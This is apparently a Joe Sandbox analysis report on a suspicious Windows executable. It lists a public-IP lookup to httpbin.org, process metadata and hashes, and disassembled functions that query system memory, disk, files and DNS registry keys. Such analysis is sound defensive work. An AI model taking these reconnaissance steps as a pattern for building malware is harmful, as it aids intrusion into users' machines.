Timestamp	Bytes transferred	Direction	Data
2025-01-02 08:15:07 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2025-01-02 08:15:07 UTC	224	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 08:15:07 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2025-01-02 08:15:07 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	03:15:02
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\random(5).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random(5).exe"
Imagebase:	0xe30000
File size:	4'484'096 bytes
MD5 hash:	F200A3445A8034D201EEB79BB29E1D73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	19.9%
Signature Coverage:	15.7%
Total number of Nodes:	332
Total number of Limit Nodes:	45

Executed Functions

Function 00E6F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s connect timeout after %lldms, move on!, xrefs: 00E6FA33
ipv4, xrefs: 00E6F331, 00E6F34B, 00E6F36C, 00E6F3EC, 00E6F5BB
%s starting (timeout=%lldms), xrefs: 00E6FCDD, 00E6FEB1
all eyeballers failed, xrefs: 00E700FF
%s done, xrefs: 00E6F9CD, 00E6FD27, 00E6FF03
connect.c, xrefs: 00E6F3BB, 00E6F4FA
Connected to %s (%s) port %u, xrefs: 00E70026
Connection time-out, xrefs: 00E6F2A3
%s trying next, xrefs: 00E6F8FE
created %s (timeout %lldms), xrefs: 00E6F4BE, 00E6F5DF
%s connect -> %d, connected=%d, xrefs: 00E6F720
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00E70254
%s assess started=%d, result=%d, xrefs: 00E70150, 00E701AE
Connection timeout after %lld ms, xrefs: 00E700AC
ipv6, xrefs: 00E6F3DC

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: 80f0365cd6543fb15a38cb8edf2212efe9e163f6aa53f3fafab64e56ff5f82f6
Instruction ID: 667442e89a49b3200cd96928c4e8d047aaded292fc4e619daa1f01bdb88936a5
Opcode Fuzzy Hash: 80f0365cd6543fb15a38cb8edf2212efe9e163f6aa53f3fafab64e56ff5f82f6
Instruction Fuzzy Hash: F8C2A131A043449FD714CF29E484B6AB7E1BF84358F05E66DEC98AB262D771ED84CB81

Function 00E3255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00E32579
GlobalMemoryStatusEx.KERNELBASE ref: 00E325CC
GetDriveTypeA.KERNELBASE ref: 00E32647
GetDiskFreeSpaceExA.KERNELBASE ref: 00E3267E
KiUserCallbackDispatcher.NTDLL ref: 00E327E2
FindFirstFileW.KERNELBASE ref: 00E328F8
FindNextFileW.KERNELBASE ref: 00E3291F

Strings

`, xrefs: 00E329BC
;%, xrefs: 00E327FE
@, xrefs: 00E325B4

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: ;%$@$`
API String ID: 3271271169-3130814153
Opcode ID: 078e48b1020a55dd18544f75ba65414c7f6cf4264d29b18a9c9081dacdd47d5f
Instruction ID: ba16964cb857b6cbb86a48a76101952b200653962c231d0fbe90310160974197
Opcode Fuzzy Hash: 078e48b1020a55dd18544f75ba65414c7f6cf4264d29b18a9c9081dacdd47d5f
Instruction Fuzzy Hash: B4D1A3B49047199FCB11EFA8C59469EBBF0BF48344F01896DE898A7354E734DA84CF52

Function 00E329FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00E32A27
RegOpenKeyExA.KERNELBASE ref: 00E32A8A
CharUpperA.USER32 ref: 00E32AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00E32C26
CloseHandle.KERNELBASE ref: 00E32C49
CloseHandle.KERNELBASE ref: 00E32DFC

Strings

0, xrefs: 00E32DA9

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: fab398eedb1ad3bb01c3391ec954ae67c640e43d077157a52f2584447915c20b
Instruction ID: 4a5eaa2d6c9ca38f4beb66a988c5d919c19f29b6c8f7d0d9ab746832e4448da6
Opcode Fuzzy Hash: fab398eedb1ad3bb01c3391ec954ae67c640e43d077157a52f2584447915c20b
Instruction Fuzzy Hash: 55E1E4B49043099FDB10EF68D98469EBBF4AF44344F40886EE998EB354E774D988CF42

Function 00E405B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00E40711
WSAEventSelect.WS2_32(?,?,00000000), ref: 00E409DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E409FC

Strings

N=, xrefs: 00E40A65
multi.c, xrefs: 00E407B2

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: N=$multi.c
API String ID: 2170980988-1544942961
Opcode ID: 886030f55444bdd04d2c47f62df411e4e75c081e3555d86317a8a7ef2192b04d
Instruction ID: d8ec7bd1c1e0a29905873b17bba81e1f5476922f125f34e3ba1e08f9f212f9fe
Opcode Fuzzy Hash: 886030f55444bdd04d2c47f62df411e4e75c081e3555d86317a8a7ef2192b04d
Instruction Fuzzy Hash: 77D1BF756083019FE710DF24E885BAB7BE5BFD4308F04683DFA85A6241E774E948DB92

Function 00EFB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00EFB2B7

Strings

ares__sortaddrinfo.c, xrefs: 00EFB3ED
cur != NULL, xrefs: 00EFB3F2

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: bd368715ebc869f7fbe4fe6acebfc766d8944b8c3b142bee9bae20decdac82c8
Instruction ID: 3f6a21498c29a8271cda1f0fa0da2623b2afc57adbc723a12875bc8401f892e9
Opcode Fuzzy Hash: bd368715ebc869f7fbe4fe6acebfc766d8944b8c3b142bee9bae20decdac82c8
Instruction Fuzzy Hash: A0C191716053099FD718DF24C880A7A77E2FF88344F15986CEA49AB3A1E774ED45CB81

Function 00E46FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f3cf50504f829b17dfa4a0df71ae296345b4165fca705d9d84683584776481
Instruction ID: 21595f6d8da087cb563af7bdb872749ba03636d176d0d588d94dbf35d91373d2
Opcode Fuzzy Hash: 41f3cf50504f829b17dfa4a0df71ae296345b4165fca705d9d84683584776481
Instruction Fuzzy Hash: 9491E33060D3494BD7358E69A8947BB72D9EFC4328F14AB2CE8E9632D4EB759C40D6C1

Function 00E31160 Relevance: 1.7, APIs: 1, Instructions: 208COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E31238

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 245e1ecc4a6d38685374b067956a56365567a8471399c51268830a25a9b21acb
Instruction ID: 12593b1ae2b82ab3e4f7c3fd356fc5e12173a188aa3d349a7c062110e942e05d
Opcode Fuzzy Hash: 245e1ecc4a6d38685374b067956a56365567a8471399c51268830a25a9b21acb
Instruction Fuzzy Hash: 0381D0B1904305CFDB25EF64E4893AEBBE1FB54308F12586DC995AB304D731A848EB92

Function 00E311A3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E31238

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 01da3b13a11a31e144114f772af17367a1ca25a60b0ec519eed331d0b3870518
Instruction ID: a0e4303bd2db88ea2d351e155f0b208acc937995eff436e8c852491cce1ac3e7
Opcode Fuzzy Hash: 01da3b13a11a31e144114f772af17367a1ca25a60b0ec519eed331d0b3870518
Instruction Fuzzy Hash: 5A4179B0A043058FDB25EF68E4857AEBBF1FB54308F12586DC894AB304D770A849DF92

Function 00E313C9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E31238

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7720d1f89b53d05a525786f9b1651745827404cd004ad6684726a944a3f354a7
Instruction ID: c3df804f239ef6281f12dc10cae49fb993dc37ac413c550bc3af5ea1bc05c7ae
Opcode Fuzzy Hash: 7720d1f89b53d05a525786f9b1651745827404cd004ad6684726a944a3f354a7
Instruction Fuzzy Hash: D84148B0A043058FDB25EF68E5857AEBBF1FB54308F12586DC994AB304D730A849EF52

Function 00EFA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00EE712E,?,?,?,00001001,00000000), ref: 00EFA90D

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 618471cedd21961d46a36331e15d9d10db37a33d5afde20334b37502d7994704
Instruction ID: 2a314fcc1be8acef1cdbb028f8aa3ec34ee16b0ffc5be75e8db657494abc5550
Opcode Fuzzy Hash: 618471cedd21961d46a36331e15d9d10db37a33d5afde20334b37502d7994704
Instruction Fuzzy Hash: 3AF049B5108308AFD2109E11EC88D7BBBADEBC9758F05896DF94C272118270AE108AB2

Function 00EEA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EEAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EEAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00EEAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EEAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EEAB30
RegCloseKey.KERNELBASE(?), ref: 00EEAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00EEAB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00EEAC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00EEAD0A
RegEnumKeyExA.KERNELBASE ref: 00EEAD8D
RegCloseKey.KERNELBASE(?), ref: 00EEADD9
RegEnumKeyExA.KERNELBASE ref: 00EEAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00EEAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EEAE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EEAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EEAFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00EEB072

Strings

